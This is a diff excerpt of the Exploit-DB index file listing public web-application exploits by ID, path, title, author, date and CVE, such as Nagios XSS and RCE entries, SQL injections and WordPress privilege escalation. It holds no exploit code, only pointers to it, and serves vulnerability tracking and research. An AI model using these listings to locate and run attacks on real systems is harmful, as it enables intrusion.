48772,exploits/multiple/webapps/48772.txt,"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting",2020-08-28,"Jinson Varghese Behanan",webapps,multiple,,2020-08-28,2020-08-28,0,,,,,,
|
||||
49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
|
||||
52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-03,0,,,,,,
|
||||
52138,exploits/multiple/webapps/52138.txt,"Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)",2025-04-08,"Calil Khalil",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2019-15949,,,,,
|
||||
51925,exploits/multiple/webapps/51925.py,"Nagios XI Version 2024R1.01 - SQL Injection",2024-03-25,"Jarod Jaslow (MAWK)",webapps,multiple,,2024-03-25,2024-03-25,0,,,,,,
|
||||
41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"SQL Injection (SQLi)",,,,
|
||||
41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"Cross-Site Scripting (XSS)",,,,
|
||||
|
@ -12359,6 +12365,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
44350,exploits/multiple/webapps/44350.py,"TwonkyMedia Server 7.0.11-8.5 - Directory Traversal",2018-03-28,"Sven Fassbender",webapps,multiple,,2018-03-28,2018-03-28,0,CVE-2018-7171,,,,http://www.exploit-db.comTwonkyServer-8.5.exe,
|
||||
44351,exploits/multiple/webapps/44351.txt,"TwonkyMedia Server 7.0.11-8.5 - Persistent Cross-Site Scripting",2018-03-28,"Sven Fassbender",webapps,multiple,,2018-03-28,2018-03-28,0,CVE-2018-7203,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comTwonkyServer-8.5.exe,
|
||||
47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,80,2019-08-01,2019-08-02,0,,"Cross-Site Scripting (XSS)",,,,
|
||||
52139,exploits/multiple/webapps/52139.txt,"UNA CMS 14.0.0-RC - PHP Object Injection",2025-04-08,"Egidio Romano",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
|
||||
49150,exploits/multiple/webapps/49150.txt,"Under Construction Page with CPanel 1.0 - SQL injection",2020-12-02,"Mayur Parmar",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
|
||||
47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,80,2019-07-01,2019-07-03,0,,"SQL Injection (SQLi)",,,,
|
||||
43362,exploits/multiple/webapps/43362.md,"vBulletin 5.x - 'cacheTemplates' Remote Arbitrary File Deletion",2017-12-13,SecuriTeam,webapps,multiple,,2017-12-18,2019-10-01,0,CVE-2017-17672,,,,,https://blogs.securiteam.com/index.php/archives/3573
|
||||
|
@ -12414,6 +12421,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
41692,exploits/multiple/webapps/41692.rb,"WordPress Plugin Ninja Forms 2.9.36 < 2.9.42 - File Upload (Metasploit)",2016-05-04,Metasploit,webapps,multiple,,2017-03-23,2017-03-23,1,CVE-2016-1209;OSVDB-8485,,,,,https://github.com/rapid7/metasploit-framework/blob/8cd9a9b6708c4a175d5175879169188dc8014a51/modules/exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.rb
|
||||
49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
|
||||
33937,exploits/multiple/webapps/33937.txt,"WordPress Plugin TYPO3 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,webapps,multiple,,2010-05-05,2016-09-26,1,,,,,,https://www.securityfocus.com/bid/39926/info
|
||||
52137,exploits/multiple/webapps/52137.txt,"WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation",2025-04-08,"Al Baradi Joy",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
|
||||
37573,exploits/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",webapps,multiple,,2012-08-06,2015-07-11,1,,,,,,https://www.securityfocus.com/bid/54812/info
|
||||
40134,exploits/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php
|
||||
40135,exploits/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue